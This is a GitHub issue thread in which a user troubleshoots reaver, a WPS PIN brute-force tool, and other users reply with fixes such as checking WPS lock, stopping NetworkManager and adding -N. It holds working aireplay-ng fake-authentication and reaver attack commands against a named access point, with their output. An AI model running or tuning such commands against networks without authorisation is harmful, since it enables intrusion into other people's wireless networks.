t6x/reaver-wps-fork-t6x #359: Timeout error issue unsolved!!!

samyak1971, 2022-08-11:
My injection is working, my AP Packets are received and sent, as per reaver , version-I tried 1.6.6,1.6.5,1.5.3 and now currently i am solving with version 1.4 but still not solved. Please help...

samyak1971, 2022-08-11:
┌──(root㉿kali)-[~]
└─# aireplay-ng --test wlan0          
03:20:05  Trying broadcast probe requests...
03:20:05  Injection is working!

samyak1971, 2022-08-11:
CH  9 ][ Elapsed: 0 s ][ 2022-08-11 03:02                                                                                                                                                                                                 
                                                                                                                                                                                                                                           
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID 

 78:DD:12:80:71:C6  -36        9       86    0   1  130   WPA2 CCMP   PSK  Administrator

samyak1971, 2022-08-11:
┌──(root㉿kali)-[~]
└─# aireplay-ng --fakeauth 30 -a A8:DA:0C:03:BC:5B -h 28:87:BA:C7:FD:D1 wlan0 
03:26:50  Waiting for beacon frame (BSSID: A8:DA:0C:03:BC:5B) on channel 1

03:26:50  Sending Authentication Request (Open System) [ACK]
03:26:50  Authentication successful
03:26:50  Sending Association Request [ACK]
03:26:50  Association successful :-) (AID: 1)

03:27:05  Sending keep-alive packet [ACK]
03:27:20  Sending Authentication Request (Open System) [ACK]
03:27:20  Got a deauthentication packet! (Waiting 3 seconds)

03:27:23  Sending Authentication Request (Open System) [ACK]

03:27:25  Sending Authentication Request (Open System) [ACK]
03:27:25  Authentication successful
03:27:25  Sending Association Request [ACK]
03:27:25  Association successful :-) (AID: 1)

03:27:40  Sending keep-alive packet [ACK]
03:27:53  Got a deauthentication packet! (Waiting 3 seconds)

03:27:56  Sending Authentication Request (Open System) [ACK]
03:27:56  Authentication successful
03:27:56  Sending Association Request [ACK]
03:27:56  Association successful :-) (AID: 1)
^C

samyak1971, 2022-08-11:
┌──(root㉿kali)-[~]
└─# reaver -b A8:DA:0C:03:BC:5B -c 1 -i wlan0 -vv --no-associate

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan0 to channel 1
[+] Waiting for beacon from A8:DA:0C:03:BC:5B
[+] Associated with A8:DA:0C:03:BC:5B (ESSID: Administrator)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
^C
[+] Nothing done, nothing to save.

samyak1971, 2022-08-11:
Kindly someone tell me , what i am doing wrong

soxrok2212, 2022-08-11:
Have you checked if WPS is actually enabled or if it’s locked? Try wash.

wifislax-ng, 2022-08-11:
Hi , i have similar issue if no stop networkmanager service.
For some reason , have interference , i have 2 cards , one connected , and other disconnected .
For reaver obviously i use disconnected card , but ,  ... not work as spected if not stop networkmanager.

Check and try.

october262, 2022-08-13:
> Kindly someone tell me , what i am doing wrong

most routers are no longer vulnerable to this kind any more.

soxrok2212, 2022-10-21:
No response in a few months, considering this closed. FWIW, looks like your card is sending a NACK too soon. Try adding `-N`.

closed 2022-10-21 by soxrok2212